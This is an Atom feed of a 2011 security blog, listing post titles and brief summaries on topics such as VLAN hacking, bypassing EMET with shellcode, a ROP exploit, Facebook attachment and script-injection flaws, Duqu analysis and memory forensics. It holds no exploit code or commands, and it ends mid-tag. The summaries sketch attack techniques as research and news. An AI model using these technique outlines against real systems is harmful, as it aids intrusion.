<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-7832887832011382499</id><updated>2011-12-27T21:08:58.275+08:00</updated><category term='Python'/><category term='shellcode'/><category term='Backdoored'/><category term='reverse engineering'/><category term='Aplication'/><category term='Meterpreter'/><category term='metasploit'/><category term='Windows'/><category term='Security'/><category term='Movie'/><category term='forensics'/><category term='Web'/><category term='Rootkits'/><category term='Exploitation'/><category term='Stuxnet/Duqu'/><category term='Malware'/><category term='Browser'/><category term='ios'/><category term='Linux'/><category term='Virus'/><category term='Wifi'/><category term='Networking'/><category term='Vulnerability'/><category term='Exploits'/><category term='Honeypot'/><category term='Jailbreak'/><category term='Hacking'/><category term='Hijacking'/><category term='password attack'/><category term='Android'/><category term='Facebook'/><category term='News'/><category term='Cloud'/><category term='HTML5'/><title type='text'>c0decstuff</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><link rel='next' type='application/atom+xml' 
href='http://www.blogger.com/feeds/7832887832011382499/posts/default?start-index=101&amp;max-results=100'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>137</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7435695919551414303</id><published>2011-12-20T02:58:00.001+08:00</published><updated>2011-12-20T03:08:14.933+08:00</updated><title type='text'>Hacking VLAN</title><summary type='text'>Introduction

A Virtual LAN (VLAN) is a group of hosts that communicate with each other even though they are in different physical locations. A VLAN gives users location independence, saves bandwidth, eases device management, and is cost effective for the organization.

VLAN is based on Layer 2 “Data link” of the OSI Model. The OSI </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7435695919551414303/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/hacking-vlan.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7435695919551414303'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7435695919551414303'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/hacking-vlan.html' title='Hacking VLAN'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-imaJronnR78/Tu-CwP9R4UI/AAAAAAAAAMA/t_kgWrqZwtg/s72-c/120711_2318_VLANHacking1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3374929443742905966</id><published>2011-12-20T02:13:00.000+08:00</published><updated>2011-12-20T02:13:07.224+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='shellcode'/><title type='text'>Bypassing EMET’s EAF with custom shellcode using kernel pointer</title><summary type='text'>Recently I have been testing out Microsoft’s “Enhanced Mitigation Experience Toolkit” (EMET) tool for exploit mitigation. This is a free tool and is designed to harden or secure applications without having to recode them. One exploit I used to test was Adobe Flash’s “Action script type confusion” vulnerability (CVE-2010-3654). This vulnerability affects version 10.1.53.64 and below. 
I used the </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3374929443742905966/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/bypassing-emets-eaf-with-custom.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3374929443742905966'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3374929443742905966'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/bypassing-emets-eaf-with-custom.html' title='Bypassing EMET’s EAF with custom shellcode using kernel pointer'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-Jox4O8TtYd0/Tu96ZC_uilI/AAAAAAAAALo/W-rKqK-RVrM/s72-c/mamank.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1901194523696184107</id><published>2011-12-05T03:28:00.001+08:00</published><updated>2011-12-05T03:29:54.102+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Malware'/><category scheme='http://www.blogger.com/atom/ns#' term='Android'/><title type='text'>AndroidMalwareAnalysis</title><summary type='text'>Foncy
Foncy is an SMS Android malware that targets European countries, with a few analyses available:

Kaspersky
We can analyze it (sample sha256: 98a402d885cdb941dca8b45a4bbcbbe7f44ba62910d519bc1c2161dba117ebd2) with Androguard, and Ded decompiler:


And we can easily find where the permissions are used:


The sendTextMessage method is called 5 times in the bytecodes. If you would like to have a better view </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1901194523696184107/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/androidmalwareanalysis_05.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1901194523696184107'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1901194523696184107'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/12/androidmalwareanalysis_05.html' title='AndroidMalwareAnalysis'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-7xF__o-QjiM/TtvGxZH1_jI/AAAAAAAAAJ4/1Wy57HgoeOk/s72-c/foncy1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7427929927471048247</id><published>2011-11-27T22:31:00.000+08:00</published><updated>2011-11-27T22:31:23.832+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ios'/><title type='text'>How to Fix iOS 5 Errors</title><summary type='text'>How to fix iOS 5 Problems ? Believe me almost every user of iOS 5 must have been faced with such errors while updating to iOS 5. The problem might have been a result of excessive phone calls, downloading, updating and pinging Apple’s servers.
There is nothing much to worry about, but the only solution is to carry on with the updating trials. The following tips work and all only for those who are </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7427929927471048247/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/how-to-fix-ios-5-errors.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7427929927471048247'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7427929927471048247'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/how-to-fix-ios-5-errors.html' title='How to Fix iOS 5 Errors'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-QPEBbUww5nQ/TtJJXsKRAhI/AAAAAAAAAJw/e84bsKBV1pU/s72-c/images.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6813974949822409993</id><published>2011-11-27T22:04:00.000+08:00</published><updated>2011-11-27T22:04:42.970+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='ios'/><category scheme='http://www.blogger.com/atom/ns#' term='Jailbreak'/><title type='text'>Jailbreak iOS 5.0/iOS 5.0.1 Using Ac1dSn0w</title><summary type='text'>Wait, don’t get your hopes up! Yes, Ac1dSn0w is a new jailbreak tool but it doesn’t bring a new “jailbreak” for iPhone 4S, iPad 2 or untethers iOS 5. Ac1dsn0w jailbreak tool developed by PwnDevTeam which makes jailbreaking much easier. 
Below we’ll explain more.

Ac1dSn0w beta version is now available which is currently available only for Mac OS X users. It does a tethered jailbreak of iOS 5 and </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6813974949822409993/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/jailbreak-ios-50ios-501-using-ac1dsn0w.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6813974949822409993'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6813974949822409993'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/jailbreak-ios-50ios-501-using-ac1dsn0w.html' title='Jailbreak iOS 5.0/iOS 5.0.1 Using Ac1dSn0w'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/-caBBF37ne0U/TtJCH28-4OI/AAAAAAAAAJY/LAnQm8AHRx4/s72-c/1.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1682844380054039564</id><published>2011-11-17T06:50:00.013+08:00</published><updated>2011-11-17T07:34:18.207+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Facebook'/><title type='text'>Anatomy of Self Inflicted Javascript Injection "facebook"</title><summary type='text'>Facebook: Anatomy of Self-Inflicted Javascript InjectionMany are already familiar with "likejacking" (a form of "clickjacking") in which a user is tricked into clicking on and interacting with the Facebook "like" button -- this has been one of the most common 
vectors of abusing Facebook. For example, the "like" button may be hidden behind an image such as a picture of an embedded YouTube video </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1682844380054039564/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/facebook-anatomy-of-self-inflicted.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1682844380054039564'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1682844380054039564'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/facebook-anatomy-of-self-inflicted.html' title='Anatomy of Self Inflicted Javascript Injection &quot;facebook&quot;'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-4o_XBmGt5TI/TsPZ0xkYL_I/AAAAAAAAAzI/-AOsZsJLbpA/s72-c/Screen+shot+2011-11-16+at+10.34.08+AM.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-6816922455361544871</id><published>2011-11-14T23:52:00.000+08:00</published><updated>2011-11-14T23:52:59.118+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Cloud'/><title type='text'>Understanding Private Clouds</title><summary type='text'>




   </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/6816922455361544871/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/understanding-private-clouds.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6816922455361544871'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/6816922455361544871'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/understanding-private-clouds.html' title='Understanding Private Clouds'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8188105985813409996</id><published>2011-11-14T05:02:00.004+08:00</published><updated>2011-11-14T05:14:18.687+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='HTML5'/><title type='text'>HTML5, Local Storage, and XSS</title><summary type='text'>A nice new feature of HTML 5 is local storage. Briefly, this is a client side storage option that can be easily accessed via JavaScript. The benefit of local storage over other client side storage options is that local storage allows more storage space than other options (cookies, flash obj, etc). 
In addition, unlike cookies, the data is not automatically appended to every request by the browser.</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8188105985813409996/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/html5-local-storage-and-xss.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8188105985813409996'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8188105985813409996'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/html5-local-storage-and-xss.html' title='HTML5, Local Storage, and XSS'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-1289562704091471538</id><published>2011-11-13T00:26:00.000+08:00</published><updated>2011-11-13T00:26:25.066+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Honeypot'/><title type='text'>Honey Potting for MS11-083</title><summary type='text'>MS11-083  has arrived and people are getting both excited and scared, it looks  like its going to be the next MS08-067. Which if you remember, Conficker  used to bend windows over and have a jol. Time for a honeypot?

In any case I took a moment and decided to write a script that would  capture potential MS11-083 traffic in an attempt to capture this exploit  in the wild (once it's out there, might</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/1289562704091471538/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/honey-potting-for-ms11-083.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1289562704091471538'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/1289562704091471538'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/honey-potting-for-ms11-083.html' title='Honey Potting for MS11-083'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4566862311568469462</id><published>2011-11-09T08:40:00.003+08:00</published><updated>2011-11-09T08:43:17.997+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet/Duqu'/><title type='text'>Duqu Installer Contained Microsoft Word Zero-Day Exploit</title><summary type='text'>Earlier this week Symantec released an update on Duqu. Apparently an installer was found for Duqu (dubbed Stuxnet II) that used a Microsoft Zero-day:
   
“The installer file is a Microsoft Word document (.doc) that exploits a previously unknown kernel vulnerability that allows code execution. We contacted Microsoft regarding the vulnerability and they’re working diligently towards issuing a patch</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4566862311568469462/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/duqu-installer-contained-microsoft-word.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4566862311568469462'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4566862311568469462'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/duqu-installer-contained-microsoft-word.html' title='Duqu Installer Contained Microsoft Word Zero-Day Exploit'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-8704829854445616340</id><published>2011-11-09T08:35:00.000+08:00</published><updated>2011-11-09T08:35:38.008+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Virus'/><title type='text'>The History of Computer Viruses</title><summary type='text'>   </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/8704829854445616340/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/history-of-computer-viruses.html#comment-form' title='0 Komentar'/><link rel='edit' 
type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8704829854445616340'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/8704829854445616340'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/history-of-computer-viruses.html' title='The History of Computer Viruses'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-5969310280548542244</id><published>2011-11-09T08:14:00.000+08:00</published><updated>2011-11-09T08:15:00.000+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='forensics'/><title type='text'>Memory Forensics</title><summary type='text'>Pull Process &amp; Network Connections from a Memory Dump   

In the previous article, we learned how to pull passwords from a memory dump file. This time, we will cover viewing a process list and network connections out of captured memory files.
Volatility’s “pslist” command can be used to view the processes that were running on a Windows system:
volatility pslist -f memdumpfilename.raw --profile=</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/5969310280548542244/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/memory-forensics.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5969310280548542244'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/5969310280548542244'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/memory-forensics.html' title='Memory Forensics'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2669656539718275386</id><published>2011-11-07T19:38:00.002+08:00</published><updated>2011-11-07T19:44:02.709+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hijacking'/><title type='text'>Hijacking Google Analytics</title><summary type='text'>The Rambling Intro
This is a fun one I came up with while looking at a site this week. I  feel sure that somebody else must have come up with this before me, but  I’ve never seen anyone blog about it or anything, so here goes.
The back story is that somebody posted a link to some “password  strength checker” website, in which of course you type your password and  it tells you how long it thinks it</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/2669656539718275386/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/hijacking-google-analytics.html#comment-form' title='1 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2669656539718275386'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/2669656539718275386'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/hijacking-google-analytics.html' title='Hijacking Google Analytics'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-7876493468375842726</id><published>2011-11-07T06:08:00.000+08:00</published><updated>2011-11-07T06:08:06.117+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Vulnerability'/><category scheme='http://www.blogger.com/atom/ns#' term='Exploits'/><title type='text'>RemoteExec Computers List Buffer Overflow ROP Exploit</title><summary type='text'>In this post I’ll be writing about a ROP (Return Object Programming)  exploit that I had recently developed for a vulnerability I had  discovered in an application called “RemoteExec”. The vulnerability is  caused when opening a .rec file containing an overly long line  triggering a stack-based buffer overflow. 
It was first published in  March 2010 reported in version 4.04 and fixed in version </summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/7876493468375842726/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/remoteexec-computers-list-buffer.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7876493468375842726'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/7876493468375842726'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/remoteexec-computers-list-buffer.html' title='RemoteExec Computers List Buffer Overflow ROP Exploit'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-3856611305670101223</id><published>2011-11-04T22:14:00.000+08:00</published><updated>2011-11-04T22:14:50.213+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Jailbreak'/><title type='text'>Jailbreak iOS 5.0.1 On Windows Using Sn0wbreeze 2.8b9 – video</title><summary type='text'>Sn0wbreeze  v2.8b9 has been released by iH8snow the well known hacker to jailbreak  iOS 5.0.1 beta, the new jailbreaking tool fixes ibooks sandbox crashing  issues,  location services issues with iPhone 3GS users running the iPad  baseband finally Sn0wbreeze v2.8b9 fixes many issues and bugs.
Notes: Don’t forget it’s a tethered jailbreak for all device expect iPhone 3G old bootrom and it does not</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/3856611305670101223/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/jailbreak-ios-501-on-windows-using.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3856611305670101223'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/3856611305670101223'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/11/jailbreak-ios-501-on-windows-using.html' title='Jailbreak iOS 5.0.1 On Windows Using Sn0wbreeze 2.8b9 – video'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4267974489916765732</id><published>2011-10-29T01:37:00.000+08:00</published><updated>2011-10-29T01:37:33.383+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Stuxnet/Duqu'/><title type='text'>Win32/Duqu analysis: the RPC edition</title><summary type='text'>My Russian colleagues Aleksandr Matrosov and Eugene Rodionov have  found some time to do some more analysis on Win32/Duqu. (Don’t you guys sleep?)
In the previous post (http://blog.eset.com/2011/10/25/win32duqu-it%e2%80%99s-a-date)  they concentrated on analyzing the Duqu configuration file format and  extracting the exact date on which the system was infected. This time  they investigated Duqu’s</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4267974489916765732/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/10/win32duqu-analysis-rpc-edition.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4267974489916765732'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4267974489916765732'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/10/win32duqu-analysis-rpc-edition.html' title='Win32/Duqu analysis: the RPC edition'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-4917163774155083650</id><published>2011-10-28T04:45:00.007+08:00</published><updated>2011-10-28T04:56:35.677+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Facebook'/><title type='text'>Facebook Attach EXE Vulnerability</title><summary type='text'>1. Summary:
When using the Facebook 'Messages' tab, there is a feature to attach a file. Using this feature normally, the site won't allow a user to attach an executable file. A bug was discovered that subverts this security mechanism. Note, you do NOT have to be friends with the user to send them a message with an attachment.
--------------------------------------------------------------------</summary><link rel='replies' type='application/atom+xml' href='http://c0decstuff.blogspot.com/feeds/4917163774155083650/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://c0decstuff.blogspot.com/2011/10/facebook-attach-exe-vulnerability.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4917163774155083650'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/7832887832011382499/posts/default/4917163774155083650'/><link rel='alternate' type='text/html' href='http://c0decstuff.blogspot.com/2011/10/facebook-attach-exe-vulnerability.html' title='Facebook Attach EXE Vulnerability'/><author><name>c0decstuff</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://4.bp.blogspot.com/_rIh95t1bhWM/TTPOkIOeclI/AAAAAAAAAIk/bvBhYC2j5BU/S220/LKM3_512.png'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/-nK7L1bL6W3Y/Tqjerfrk9hI/AAAAAAAAACs/6drfxevKiIc/s72-c/error_uploading.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-7832887832011382499.post-2537378782923773108</id><published>2011-08-19T07:08:00.000+08:00</published><updated>2011-08-19T07:08:07.093+08:00</updated><category 